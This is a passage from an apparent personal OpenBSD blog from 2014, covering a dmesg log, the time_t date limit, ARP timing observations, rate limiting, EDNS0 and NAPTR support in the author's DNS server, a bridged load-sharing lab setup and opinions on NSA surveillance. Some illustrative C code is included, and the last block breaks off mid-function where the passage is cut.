x2APIC,MOVBE,POPCNT,DEADLINE,AES,XSAVE,AVX,F16C,RDRAND,NXE,LONG,LAHF,ABM,\
PERF,ITSC,FSGSBASE,BMI1,HLE,AVX2,SMEP,BMI2,ERMS,INVPCID,RTM
cpu6: 256KB 64b/line 8-way L2 cache
cpu6: smt 1, core 2, package 0
cpu7 at mainbus0: apid 7 (application processor)
cpu7: Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz, 3604.30 MHz
cpu7: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES64,\
MWAIT,DS-CPL,VMX,SMX,EST,TM2,SSSE3,FMA3,CX16,xTPR,PDCM,PCID,SSE4.1,SSE4.2,\
x2APIC,MOVBE,POPCNT,DEADLINE,AES,XSAVE,AVX,F16C,RDRAND,NXE,LONG,LAHF,ABM,\
PERF,ITSC,FSGSBASE,BMI1,HLE,AVX2,SMEP,BMI2,ERMS,INVPCID,RTM
cpu7: 256KB 64b/line 8-way L2 cache
cpu7: smt 1, core 3, package 0
ioapic0 at mainbus0: apid 8 pa 0xfec00000, version 20, 24 pins
acpimcfg0 at acpi0 addr 0xf8000000, bus 0-63
acpihpet0 at acpi0: 14318179 Hz
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus 5 (RP01)
acpiprt2 at acpi0: bus 6 (RP03)
acpiprt3 at acpi0: bus 7 (RP06)
acpiprt4 at acpi0: bus 8 (RP08)
acpiprt5 at acpi0: bus 1 (PEG0)
acpiprt6 at acpi0: bus -1 (PEG1)
acpiprt7 at acpi0: bus -1 (PEG2)
acpiec0 at acpi0: Failed to read resource settings
acpicpu0 at acpi0: C1, PSS
acpicpu1 at acpi0: C1, PSS
acpicpu2 at acpi0: C1, PSS
acpicpu3 at acpi0: C1, PSS
acpicpu4 at acpi0: C1, PSS
acpicpu5 at acpi0: C1, PSS
acpicpu6 at acpi0: C1, PSS
acpicpu7 at acpi0: C1, PSS
acpipwrres0 at acpi0: FN00, resource for FAN0
acpipwrres1 at acpi0: FN01, resource for FAN1
acpipwrres2 at acpi0: FN02, resource for FAN2
acpipwrres3 at acpi0: FN03, resource for FAN3
acpipwrres4 at acpi0: FN04, resource for FAN4
acpitz0 at acpi0: critical temperature is 105 degC
acpitz1 at acpi0: critical temperature is 105 degC
acpibat0 at acpi0: BAT0 not present
acpibat1 at acpi0: BAT1 not present
acpibat2 at acpi0: BAT2 not present
acpibtn0 at acpi0: PWRB
acpibtn1 at acpi0: LID0
acpivideo0 at acpi0: GFX0
acpivout0 at acpivideo0: DD1F
cpu0: Enhanced SpeedStep 3604 MHz: speeds: 3501, 3500, 3300, 3100, 2900, \
2700, 2500, 2300, 2100, 2000, 1800, 1600, 1400, 1200, 1000, 800 MHz
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel Xeon E3-1200 v3 Host" rev 0x06
ppb0 at pci0 dev 1 function 0 "Intel Core 4G PCIE" rev 0x06: msi
pci1 at ppb0 bus 1
ppb1 at pci1 dev 0 function 0 vendor "PLX", unknown product 0x8747 rev 0xba
pci2 at ppb1 bus 2
ppb2 at pci2 dev 8 function 0 vendor "PLX", unknown product 0x8747 rev 0xba: msi
pci3 at ppb2 bus 4
ppb3 at pci2 dev 16 function 0 vendor "PLX", unknown product 0x8747 rev 0xba: msi
pci4 at ppb3 bus 3
vga1 at pci0 dev 2 function 0 "Intel HD Graphics P4600" rev 0x06
intagp0 at vga1
agp0 at intagp0: aperture at 0xe0000000, size 0x10000000
inteldrm0 at vga1
drm0 at inteldrm0
error: [drm:pid0:i915_write32] *ERROR* Unknown unclaimed register before writing to 100000
inteldrm0: 1920x1080
wsdisplay0 at vga1 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
azalia0 at pci0 dev 3 function 0 "Intel Core 4G HD Audio" rev 0x06: msi
azalia0: No codecs found
"Intel 8 Series xHCI" rev 0x05 at pci0 dev 20 function 0 not configured
"Intel 8 Series MEI" rev 0x04 at pci0 dev 22 function 0 not configured
ehci0 at pci0 dev 26 function 0 "Intel 8 Series USB" rev 0x05: apic 8 int 20
usb0 at ehci0: USB revision 2.0
uhub0 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
azalia1 at pci0 dev 27 function 0 "Intel 8 Series HD Audio" rev 0x05: msi
azalia1: codecs: Realtek/0x0900
audio0 at azalia1
ppb4 at pci0 dev 28 function 0 "Intel 8 Series PCIE" rev 0xd5: msi
pci5 at ppb4 bus 5
ahci0 at pci5 dev 0 function 0 vendor "Marvell", unknown product 0x9230 rev 0x10: msi, AHCI 1.2
scsibus1 at ahci0: 32 targets
uk0 at scsibus1 targ 7 lun 0:  ATAPI 3/processor removable
ppb5 at pci0 dev 28 function 2 "Intel 8 Series PCIE" rev 0xd5: msi
pci6 at ppb5 bus 6
em0 at pci6 dev 0 function 0 "Intel I210" rev 0x03: msi, address bc:ee:7b:dd:2e:5a
ppb6 at pci0 dev 28 function 5 "Intel 8 Series PCIE" rev 0xd5: msi
pci7 at ppb6 bus 7
ahci1 at pci7 dev 0 function 0 vendor "ASMedia", unknown product 0x0612 rev 0x01: msi, AHCI 1.2
scsibus2 at ahci1: 32 targets
ppb7 at pci0 dev 28 function 7 "Intel 8 Series PCIE" rev 0xd5: msi
pci8 at ppb7 bus 8
em1 at pci8 dev 0 function 0 "Intel I210" rev 0x03: msi, address bc:ee:7b:dd:2e:5b
ehci1 at pci0 dev 29 function 0 "Intel 8 Series USB" rev 0x05: apic 8 int 23
usb1 at ehci1: USB revision 2.0
uhub1 at usb1 "Intel EHCI root hub" rev 2.00/1.00 addr 1
pcib0 at pci0 dev 31 function 0 "Intel Z87 LPC" rev 0x05
pciide0 at pci0 dev 31 function 2 "Intel 8 Series SATA" rev 0x05: DMA, \
channel 0 configured to native-PCI, channel 1 configured to native-PCI
pciide0: using apic 8 int 20 for native-PCI interrupt
wd0 at pciide0 channel 1 drive 0: 
wd0: 16-sector PIO, LBA48, 152627MB, 312581808 sectors
wd0(pciide0:1:0): using PIO mode 4, Ultra-DMA mode 6
ichiic0 at pci0 dev 31 function 3 "Intel 8 Series SMBus" rev 0x05: \
apic 8 int 18
iic0 at ichiic0
spdmem0 at iic0 addr 0x50: 8GB DDR3 SDRAM PC3-12800
spdmem1 at iic0 addr 0x51: 8GB DDR3 SDRAM PC3-12800
spdmem2 at iic0 addr 0x52: 8GB DDR3 SDRAM PC3-12800
spdmem3 at iic0 addr 0x53: 8GB DDR3 SDRAM PC3-12800
pciide1 at pci0 dev 31 function 5 "Intel 8 Series SATA" rev 0x05: DMA \
(unsupported), channel 0 wired to native-PCI, channel 1 wired to native-PCI
pciide1: using apic 8 int 20 for native-PCI interrupt
pciide1: channel 0 ignored (not responding; disabled or no drives?)
atapiscsi0 at pciide1 channel 1 drive 0
scsibus3 at atapiscsi0: 2 targets
cd0 at scsibus3 targ 0 lun 0:  ATAPI 5/cdrom \
removable
isa0 at pcib0
isadma0 at isa0
com0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pcppi0 at isa0 port 0x61
spkr0 at pcppi0
uhub2 at uhub0 port 1 "Intel Rate Matching Hub" rev 2.00/0.05 addr 2
umass0 at uhub2 port 4 configuration 1 interface 0 "Generic USB Storage" rev 2.00/2.50 addr 3
umass0: using SCSI over Bulk-Only
scsibus4 at umass0: 2 targets, initiator 0
sd0 at scsibus4 targ 1 lun 0:  SCSI0 0/direct \
removable serial.05e30727000000000250
sd0: 3873MB, 512 bytes/sector, 7931904 sectors
uhub3 at uhub1 port 1 "Intel Rate Matching Hub" rev 2.00/0.05 addr 2
uvideo0 at uhub3 port 3 configuration 1 interface 0 "Logitech product 0x0819" rev 2.00/0.10 addr 3
video0 at uvideo0
uaudio0 at uhub3 port 3 configuration 1 interface 2 "Logitech product 0x0819" rev 2.00/0.10 addr 3
uaudio0: audio descriptors make no sense, error=4
ugen0 at uhub3 port 3 configuration 1 "Logitech product 0x0819" rev 2.00/0.10 addr 3
uhidev0 at uhub3 port 5 configuration 1 interface 0 "Logitech USB-PS/2 \
Optical Mouse" rev 2.00/27.20 addr 4
uhidev0: iclass 3/1
ums0 at uhidev0: 8 buttons, Z dir
wsmouse0 at ums0 mux 0
uhub4 at uhub3 port 7 "ASUS Tek. ASM107x" rev 2.00/1.00 addr 5
vscsi0 at root
scsibus5 at vscsi0: 256 targets
softraid0 at root
scsibus6 at softraid0: 256 targets
root on wd0a (6658233dd69b328f.a) swap on wd0b dump on wd0b
I compiled this all on Jupiter which then was running OpenBSD-current still.



The highest possible date on OpenBSD 5.5

April 25th, 2014

Look...

mercury$ date -r 67768036191673199            
Wed Dec 31 23:59:59 CET 2147485547
mercury$ date -r 67768036191673200            
date: conversion error
What are you doing new years eve in the year 2147485547? Hopefully not fixing the new years bug!

What's interesting is that localtime() will fail here at just under 2^55 bits. I wonder if we can take it all the way up to 2^63 bits.
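
Where the limit in the transcript above comes from: struct tm holds the year as an int counted from 1900, so the last convertible year is INT_MAX + 1900 = 2147485547, whatever the width of time_t. This is an added example, not taken from the OpenBSD source; the function names are made up, and the 3600 second offset is CET as in the transcript.

```c
#include <limits.h>
#include <stdint.h>
#include <time.h>

/* Illustrative helper names; none of these come from a libc. */

/* Leap days in the Gregorian years 1..y. */
static int64_t leap_days(int64_t y)
{
    return y / 4 - y / 100 + y / 400;
}

/* Seconds from the epoch to 00:00:00 UTC on 1 January of year y (y >= 1970). */
int64_t year_start_utc(int64_t y)
{
    int64_t days = 365 * (y - 1970) + leap_days(y - 1) - leap_days(1969);

    return days * 86400;
}

/* tm_year is an int holding "years since 1900", so this is the largest year. */
int64_t max_tm_year(void)
{
    return (int64_t)INT_MAX + 1900;
}

/*
 * Last second that still falls inside max_tm_year() for a zone that is
 * utc_offset seconds east of UTC (3600 for CET).
 */
int64_t last_convertible(long utc_offset)
{
    return year_start_utc(max_tm_year() + 1) - 1 - utc_offset;
}

/*
 * Ask the C library directly: 1 if gmtime() converts t, 0 if it reports
 * failure, -1 if this platform's time_t is too narrow to hold t at all.
 */
int libc_converts_utc(int64_t t)
{
    time_t tt;

    if (sizeof(time_t) < sizeof(int64_t))
        return -1;
    tt = (time_t)t;
    return gmtime(&tt) != NULL;
}
```

last_convertible(3600) reproduces the 67768036191673199 from the transcript, and one second later the year no longer fits in tm_year.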



Two "racing" ARP's

April 28th, 2014

OpenBSD is different than other OS's in that it has a reverse ARP channel open alongside a forward ARP channel. I tried to exploit this with one of my programs I wrote, since frames are in sequence and scheduling in the OpenBSD kernel is done in a FIFO manner.

20:33:05.793519 bc:ee:7b:dd:2e:5a ff:ff:ff:ff:ff:ff 0806 60: arp who-has \
192.168.34.1 (ff:ff:ff:ff:ff:ff) tell 192.168.34.5
  0000: ffff ffff ffff bcee 7bdd 2e5a 0806 0001  ........{..Z....
  0010: 0800 0604 0001 bcee 7bdd 2e5a c0a8 2205  ........{..Z..".
  0020: ffff ffff ffff c0a8 2201 3100 0000 0000  ........".1.....
  0030: 0000 0000 0000 0000 0000 0000            ............

20:33:05.793572 bc:ee:7b:dd:2e:5a ff:ff:ff:ff:ff:ff 8035 60: arp who-has \
192.168.34.1 (ff:ff:ff:ff:ff:ff) tell 192.168.34.5
  0000: ffff ffff ffff bcee 7bdd 2e5a 8035 0001  ........{..Z.5..
  0010: 0800 0604 0001 bcee 7bdd 2e5a c0a8 2205  ........{..Z..".
  0020: ffff ffff ffff c0a8 2201 3200 0000 0000  ........".2.....
  0030: 0000 0000 0000 0000 0000 0000            ............
Here you see two outgoing ARPs: the first, a forward ARP, is .000053 seconds before the second one, a reverse ARP (seen here with an 8035 ethernet type).
20:33:05.793773 00:90:0b:19:56:06 bc:ee:7b:dd:2e:5a 0806 60: arp reply \
192.168.34.1 is-at 00:90:0b:19:56:06
  0000: bcee 7bdd 2e5a 0090 0b19 5606 0806 0001  ..{..Z....V.....
  0010: 0800 0604 0002 0090 0b19 5606 c0a8 2201  ..........V...".
  0020: bcee 7bdd 2e5a c0a8 2205 3200 0000 0000  ..{..Z..".2.....
  0030: 0000 0000 0000 0000 0000 0000            ............

20:33:05.793774 00:90:0b:19:56:06 bc:ee:7b:dd:2e:5a 0806 60: arp reply \
192.168.34.1 is-at 00:90:0b:19:56:06
  0000: bcee 7bdd 2e5a 0090 0b19 5606 0806 0001  ..{..Z....V.....
  0010: 0800 0604 0002 0090 0b19 5606 c0a8 2201  ..........V...".
  0020: bcee 7bdd 2e5a c0a8 2205 3100 0000 0000  ..{..Z..".1.....
  0030: 0000 0000 0000 0000 0000 0000            ............
Here you see the return frames. The reverse (indicated by the number 2 in offset 0x2A) beat the forward reverse (indicated by number 1) by 0.000001 seconds, it even made up time in the TCP IP stack on the remote OpenBSD router. The reason this is, is that the reversearp does not get scheduled inside the NETISR and thus is a lot faster, it pre-empts the packet that went in before it.

These are net-games but this can be used to test the network stack load on an OpenBSD host/router to look for how much usage it gets. That in itself isn't an exploitation though.



Got OpenBSD 5.5 in the mail yesterday

May 4th, 2014

I got my pre-ordered OpenBSD CD's in the mail. Unfortunately the seal was broken so someone possibly tried these out. Also I already upgraded my entire network to 5.5 on May 1st. Let this be a warning to OpenBSD, release pre-orders early or be faced with us doing ftp installs! We can't wait we're that hooked! However the CD's are quality like always, it's just too bad these become cup coasters after half a year, but that's part of the product that someone should know about.



Wildcarddnsd now has packet rate limiting

May 5th, 2014

I don't think I've ever had someone use me for an amplification DoS attack, but I don't watch the logs all the time. However it's not impossible so I have added a rate limiting algorithm on the hash of the IP querying my server so that I will drop the query when a threshold is reached. I had given this implementation thought for a while now and finally I wrote out the code. Wildcarddnsd will use more memory depending on the packets per second (details) and the hash of IP addresses is limited to 16 bit, meaning that there can be collisions between unrelated IP addresses that cause the ratelimiting to snare. But a high enough rate limit of say 12 packets per second on a nameserver with a usual TTL of 1 day shouldn't cause a problem. The pps is definable between 1 packet per second and 127 packets per second. The maximum setting will consume up to 120 MB of RAM, but RAM is cheap when we talk about 120 MB's. :-) I'm pretty happy right now.
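
A sketch of per-source rate limiting keyed on a 16-bit hash, showing the collision effect mentioned above: a bystander whose address hashes like a flooding source gets dropped along with it. This is an added example, not wildcarddnsd's code; the XOR-fold hash, the one-second counting window, the structure layout and the sample addresses are assumptions made for illustration.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>

#define RL_BUCKETS 65536            /* one bucket per 16-bit hash value */

struct rl_bucket {
    time_t  second;                 /* the second this count belongs to */
    uint8_t count;                  /* queries answered in that second */
};

struct ratelimit {
    unsigned         pps;           /* 1..127, the range given in the post */
    struct rl_bucket bucket[RL_BUCKETS];
};

/*
 * Assumed hash (not wildcarddnsd's): XOR the address together 16 bits at a
 * time. Works for IPv4 (4 bytes) and IPv6 (16 bytes). Returns -1 if the
 * text is not an address.
 */
long rl_hash(const char *addr)
{
    unsigned char raw[16];
    size_t len, i;
    uint16_t h = 0;

    if (inet_pton(AF_INET, addr, raw) == 1)
        len = 4;
    else if (inet_pton(AF_INET6, addr, raw) == 1)
        len = 16;
    else
        return -1;
    for (i = 0; i < len; i += 2)
        h ^= (uint16_t)((raw[i] << 8) | raw[i + 1]);
    return h;
}

int rl_init(struct ratelimit *rl, unsigned pps)
{
    if (pps < 1 || pps > 127)
        return -1;
    memset(rl, 0, sizeof(*rl));
    rl->pps = pps;
    return 0;
}

/* Returns 1 if the query should be answered, 0 if it should be dropped. */
int rl_allow(struct ratelimit *rl, const char *addr, time_t now)
{
    long h = rl_hash(addr);
    struct rl_bucket *b;

    if (h < 0)
        return 0;                   /* unparsable source: drop */
    b = &rl->bucket[h];
    if (b->second != now) {         /* new second: start a fresh count */
        b->second = now;
        b->count = 0;
    }
    if (b->count >= rl->pps)
        return 0;                   /* threshold reached for this bucket */
    b->count++;
    return 1;
}

/* Send n queries from addr within second `now`; return how many were answered. */
int rl_burst(struct ratelimit *rl, const char *addr, time_t now, int n)
{
    int answered = 0;

    while (n-- > 0)
        answered += rl_allow(rl, addr, now);
    return answered;
}

/*
 * Constructed scenario at 12 pps: 10.0.0.1 floods, then 192.168.202.169,
 * which folds to the same 16-bit value (0x0a01), asks once in that second.
 */
static struct ratelimit demo;

int demo_bystander_answers(void)
{
    rl_init(&demo, 12);
    rl_burst(&demo, "10.0.0.1", 1000, 50);
    return rl_burst(&demo, "192.168.202.169", 1000, 1);
}
```

The bystander gets no answer in the flooded second and is served again in the next one, which is why a limit well above a resolver's normal query rate keeps the collisions harmless.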



Administrivia and future plans network wise

May 7th, 2014

I have added ratelimiting to io.solarscale.de which runs nsd. For this the nsd needed a recompile. This literature on the web was very helpful: nsd-ratelimit. I have set it to 12 queries per second, same as wildcarddnsd's ratelimit on americas.centroid.eu.

I have evaluated a lot of scenarios on how I want to reorganize my network and I have decided to get a DSL with static IP's in February 2015 again. I'll be running a wildcarddnsd from home again. Earlier in September 2014 my vps moon.virgostar.net will expire, I'll take it out of active DNS duty possibly in August. I'll run with 2 nameservers from that point on until 2015. In February I'm also going to get rid of the io.solarscale.de vps possibly for a transip.eu (Amsterdam) vps instead (which will run OpenBSD). This is still in the clouds (so to speak) so I'm not entirely positive on that.

And to test the transip.eu vps I'll possibly get that in November 2014 possibly after the Wildcarddnsd 0.9.0 BETA release. So a lot of shuffling is taking place, the only thing that won't change is americas.centroid.eu which is prepaid until 2016, unless they figure out how to hypervisor OpenBSD in bhyve, which I will then probably take.



Wildcarddnsd now has EDNS0 support

May 10th, 2014

I just committed the last bits. EDNS0 (RFC 6891) allows greater UDP sized packets than the RFC 1035 specification of 512 bytes per answer. This now opens the door for me to do NAPTR RR and DNSSEC which is on my Todo list. BTW RFC 6891 replaces RFC 2671 which was so impossible to figure out that I had to wait until a new RFC came on the scene. Thanks Vixie (at least he polished it)!



Wildcarddnsd now has NAPTR support

May 11th, 2014

I wanted to get this in so I can try out ENUM services. NAPTR (stands for Naming Authority Pointer) Resource Record is used in VOIP a lot. It helps reading the RFC (which I admittedly have not done fully) to get a better idea of what it does. RFC 2915. Joy!



Happy 1400000000

May 13th, 2014

UNIX timestamp just wrapped over a bit more than an hour ago..

# date -r 1400000000
Tue May 13 18:53:20 CEST 2014
The next one is in 3 years and a month or so.



OpenBSD load sharing at the switch level

May 13th, 2014

Since I got my new computer I've set up a virtual lab with 5 QEMU vm's. I want to show you an idea of mine that will drastically reduce load on a set of routers separated by a bridge. The idea is this: the lower you go in OSI layers the less load. So you could have a setup like so:



                                [0]		ISP router (layer 3)
                                 |
                                [1]		switch lev 0 (layer 2)
                               /   \ 
                             [2]   [3]		switch lev 1 (layer 2)
                            /  |   |  \
                          [4] [5] [6] [7]	router lev 0 (layer 3)

Pretend you get a lot of pps (packets per second) or traffic that an OpenBSD box can't handle. The idea in the above picture is to distribute the load on layer 2 which has a lot less overhead than layer 3 (IP routing), so if you have node 1, 2 and 3 be switches that round-robin their frames, the load will be reduced by the time the frames get to nodes 4, 5, 6, and 7. I call a router/switch a node here something with 3+ interfaces. So how would that work without causing a mess? Well I set it up in the lab and I only went as far as nodes 0, 1, 2, 3 and 4. The concept should work with another few sets of switch levels but I'm gonna keep it short. Here is the setup on node1:
$ for i in /etc/hostname.*; do echo $i; cat $i; done
/etc/hostname.bridge0
add em0 add trunk0
up
/etc/hostname.em0
inet 10.0.0.2 255.255.255.0
/etc/hostname.em1
up
/etc/hostname.em2
up
/etc/hostname.trunk0
trunkproto roundrobin 
trunkport em1 trunkport em2
up
As you can see I have added interfaces em1 and em2 to trunk0 which round robins and added that with em0 to bridge0. This works! Interface em0 doesn't need an IP but I put one on so I can reach it in the test environment. You can add another interface for out of band access. Now then for nodes 2 and 3 the magic happens:
Node2:
$ for i in /etc/hostname.*; do echo $i; cat $i; done
/etc/hostname.carp0
inet 10.20.0.2 255.255.255.0 
vhid 1
up
/etc/hostname.em0
lladdr 00:11:22:33:44:89
up
/etc/hostname.em1
inet 10.20.0.3 255.255.255.0
/etc/hostname.trunk0
inet 10.0.0.24 255.255.255.0
trunkport em0
up
!/usr/sbin/arp -s 10.0.0.2 68:03:09:13:04:07
!/usr/sbin/arp -s 10.0.0.254 fe:e1:ba:d3:a9:46
!/usr/sbin/arp -s 10.0.0.1 68:03:09:13:99:07
Node3:
$ for i in /etc/hostname.*; do echo $i; cat $i; done
/etc/hostname.carp0
inet 10.20.0.2 255.255.255.0
vhid 1
up
/etc/hostname.em0
lladdr 00:11:22:33:44:89
up
/etc/hostname.em1
inet 10.20.0.4 255.255.255.0
/etc/hostname.trunk0
inet 10.0.0.24 255.255.255.0
trunkport em0
up
!/usr/sbin/arp -s 10.0.0.2 68:03:09:13:04:07
!/usr/sbin/arp -s 10.0.0.254 fe:e1:ba:d3:a9:46
!/usr/sbin/arp -s 10.0.0.1 68:03:09:13:99:07
As you can see here the link layer address on both has been set to the same MAC address, and the network layer address as well (10.0.0.24). I had to set static ARP because return packets in the round robin on node 1 would not guarantee that ARP replies would come back to the node that asked for it. It can answer ARP though because for all it cares or knows (on either node 2 or 3) that this is its own address. Access to these boxes can only be granted on the em1 interface or on an out of band interface. I have carped the em1 interface which goes to node 4 which is a user host. From there I want to show you a ping and a traceroute to node 1.
$ ping -c 4 10.0.0.1 
PING 10.0.0.1 (10.0.0.1): 56 data bytes
64 bytes from 10.0.0.1: icmp_seq=0 ttl=254 time=3.270 ms
64 bytes from 10.0.0.1: icmp_seq=1 ttl=254 time=3.057 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=254 time=3.172 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=254 time=2.779 ms
--- 10.0.0.1 ping statistics ---
4 packets transmitted, 4 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 2.779/3.069/3.270/0.192 ms

$ traceroute 10.0.0.1
traceroute to 10.0.0.1 (10.0.0.1), 64 hops max, 40 byte packets
 1  10.20.0.4 (10.20.0.4)  2.653 ms  1.634 ms  1.187 ms
 2  10.0.0.1 (10.0.0.1)  3.364 ms  2.917 ms  2.943 ms
As you can see all packets make it. I had to disable pf(4) on nodes 2 and 3, as there was a state synchronization problem. This can be fixed with pfsync(4) but is another project worth. Also make sure that both CARP interfaces don't go into MASTER mode. Or else this causes DUP!'s (duplicate packets) in ping. This happened to me just as I was wrapping up. I hope you can build extra capability with this idea if only 1 router would not have been enough for the load behind the ISP (node 0).



The NSA, 1 year after Snowden

May 14th, 2014

Before the Snowden revelation there were the Warnings.

and after the Snowden revelation I've expressed:


and Solutions

But in conclusion there is nothing we can do. The NSA will still listen in and backdoor equipment for as long as they can. There really is not much we can do if we want to continue using the Internet. Change will be slow as recommendations are to phase out American equipment in order to be entirely safe. And then we're still not safe. Take it in stride. At least we have an inner clock that tells us that something is wrong with all this, but we mainly (or I mainly) aren't ready to hear it. It's like meeting aliens for the first time, we won't be ready.



Wildcarddnsd now has RFC 1996 (Notify) master-only support

May 17th, 2014

I tested this and it seems to work. Unfortunately I wasn't able to test the IPv6 part of it, I lack an IPv6 master server.



On my wishlist, for XMAS

May 21st, 2014

This is on my wishlist. Possibly in 6 or 7 months when I have some more money. I'm dangerously low on ports here at home and this router/firewall would be beneficial.



Ordered a new Book

May 21st, 2014

Now that I have waited 2 months and not ordered anything in order to conserve I have finally made another purchase. I have ordered "The Book of IMAP" by Peer Heinlein and Peer Hartleben. I got the idea for buying a book because I had to use Cyrus IMAP today and had to google on how to use it. This book will hopefully help me more. It's been a long time overdue.



The heaven is singing a lullaby

May 23rd, 2014

See this morning sky!

It was much nicer in person.



The Tree

May 23rd, 2014

I have doodled with iMovie on the Mac a bit this morning and this is what I've come up with. Music was randomly chosen and happens to be I Octane, Masterplan.

Watch this tree come back to life. Unfortunately the video doesn't work on OpenBSD, and I don't want to convert it now.



I went voting in the EU election!

May 25th, 2014

I voted. Nuff said.



Snowden: All German citizens are spied upon

May 28th, 2014

Through another website I heard the news. The German government meanwhile wants proof or they're calling Snowden a liar. To me the news just make sense. I heard stuff like that after 1945 there wasn't any German effort to govern the people. It was all done by the Allies of WW2. And the German government became a backseat pilot in such things such as intelligence and security. Everything in Germany after 1945 was erected in a manner that it suits the will of the allies not the will of the people. We have the NSDAP and Hitler to thank for that. Germany is a mass-surveillance experiment.

So how do I feel about that? Personally I feel it devalues everything. The money is fake, the world is fake. Fake values and fake systems. And as always the hands are tied behind one's back and it's a tough pill to swallow.

In recent conversation with my parents I had the viewpoint that Snowden was not safe in Germany and hence we should not give him Asylum. I think Snowden knows full well what he'd be getting himself into if he came to Germany. And the efforts to protect him would just be a waste of time.



Another TODO for wildcarddnsd

May 29th, 2014

A few days ago I tested wildcarddnsd with 240,000 records. I was horrified. It took 9.8 GB of hd space which took forever to load the records and when I made the underlying database filesystem a tmpfs (memory fs), it still took 30 seconds to load all records. The problem is that wildcarddnsd has a record for each domain name, so something.centroid.eu, somethingelse.centroid.eu and someother.centroid.eu are 3 records in its database. I made it so that each record is 40K large as according to this test program:

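#include <stdio.h>
/* struct domain comes from wildcarddnsd's own headers (not shown in this post) */

int
main(void)
{
        /* sizeof yields a size_t, so print it with %zu rather than %d */
        printf("%zu\n", sizeof(struct domain));
        return 0;
}

The output for that is

mercury$ ./sizecheck
44287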

So what to do. In the past wildcarddnsd malloc'ed all this data and just stored the pointers in the database. This was good until I had several processes for wildcarddnsd that fork()'ed. I could of course store all data in a shared memory mmap segment, but getting the right size for that is hard and we run into a wall when I want to deal with dynamic dns which may add a lot more records than was evident at start of the program. So I think I'm going to partition the records in struct domain and make it a little like an IPv6 packet. To explain this we have flags such as:

#define DOMAIN_HAVE_A           0x1
#define DOMAIN_HAVE_SOA         0x2
#define DOMAIN_HAVE_CNAME       0x4

I'm just going to tag on an A RR section if that flag is set in the main struct domain which adds a little bit of memory. This way it's selective. Also when we get to NAPTR pointers being excluded we save _a lot_ of space in a record. This will all be put on my TODO in the tree so stay tuned.
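
A sketch of the flag-driven layout described above, added here as an example and not taken from wildcarddnsd: a small fixed header carries the DOMAIN_HAVE_* flags and each RR section is appended only when its flag is set, the way an IPv6 packet chains extension headers. The struct layouts, MAX_A and the pack/unpack helpers are assumptions made for illustration; the unpack side validates flags, length and counts because the record size now depends on data read back from the database.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Flags from the post. */
#define DOMAIN_HAVE_A           0x1
#define DOMAIN_HAVE_SOA         0x2
#define DOMAIN_HAVE_CNAME       0x4
#define DOMAIN_KNOWN_FLAGS      (DOMAIN_HAVE_A | DOMAIN_HAVE_SOA | DOMAIN_HAVE_CNAME)

#define MAX_NAME 255    /* longest DNS name */
#define MAX_A    8      /* assumed cap on A RRs per name */

/* Hypothetical layouts, not wildcarddnsd's real struct domain. */
struct domain_hdr    { uint32_t flags; uint8_t namelen; char name[MAX_NAME]; };
struct a_section     { uint8_t count; uint32_t addr[MAX_A]; };
struct soa_section   { uint32_t serial, refresh, retry, expire, minimum; };
struct cname_section { uint8_t len; char target[MAX_NAME]; };

/* Full in-memory form; on disk only the flagged sections follow the header. */
struct domain_rec {
        struct domain_hdr hdr;
        struct a_section a;
        struct soa_section soa;
        struct cname_section cname;
};

/* Section order on disk, like a fixed chain of extension headers. */
static const struct { uint32_t flag; size_t off, len; } sections[] = {
        { DOMAIN_HAVE_A,     offsetof(struct domain_rec, a),     sizeof(struct a_section) },
        { DOMAIN_HAVE_SOA,   offsetof(struct domain_rec, soa),   sizeof(struct soa_section) },
        { DOMAIN_HAVE_CNAME, offsetof(struct domain_rec, cname), sizeof(struct cname_section) },
};
#define NSECTIONS (sizeof(sections) / sizeof(sections[0]))

/* Bytes a record with these flags occupies: header plus flagged sections. */
size_t
domain_packed_size(uint32_t flags)
{
        size_t n = sizeof(struct domain_hdr);

        for (size_t i = 0; i < NSECTIONS; i++)
                if (flags & sections[i].flag)
                        n += sections[i].len;
        return n;
}

/* Serialize d into buf; returns bytes written, or 0 if buf is too small. */
size_t
domain_pack(const struct domain_rec *d, uint8_t *buf, size_t buflen)
{
        size_t off = sizeof(d->hdr);

        if (domain_packed_size(d->hdr.flags) > buflen)
                return 0;
        memcpy(buf, &d->hdr, sizeof(d->hdr));
        for (size_t i = 0; i < NSECTIONS; i++) {
                if (!(d->hdr.flags & sections[i].flag))
                        continue;
                memcpy(buf + off, (const uint8_t *)d + sections[i].off, sections[i].len);
                off += sections[i].len;
        }
        return off;
}

/* Parse buf into d; returns 0 on success, -1 if the record is malformed. */
int
domain_unpack(struct domain_rec *d, const uint8_t *buf, size_t buflen)
{
        size_t off = sizeof(d->hdr);

        if (buflen < sizeof(d->hdr))
                return -1;
        memset(d, 0, sizeof(*d));
        memcpy(&d->hdr, buf, sizeof(d->hdr));
        /* Reject unknown flags, and lengths that disagree with the flags. */
        if (d->hdr.flags & ~(uint32_t)DOMAIN_KNOWN_FLAGS)
                return -1;
        if (domain_packed_size(d->hdr.flags) != buflen)
                return -1;
        for (size_t i = 0; i < NSECTIONS; i++) {
                if (!(d->hdr.flags & sections[i].flag))
                        continue;
                memcpy((uint8_t *)d + sections[i].off, buf + off, sections[i].len);
                off += sections[i].len;
        }
        /* Counts stored inside a section are untrusted too. */
        if (d->a.count > MAX_A)
                return -1;
        return 0;
}

int
main(void)
{
        struct domain_rec d;

        memset(&d, 0, sizeof(d));
        d.hdr.flags = DOMAIN_HAVE_A;    /* constructed sample: one A RR */
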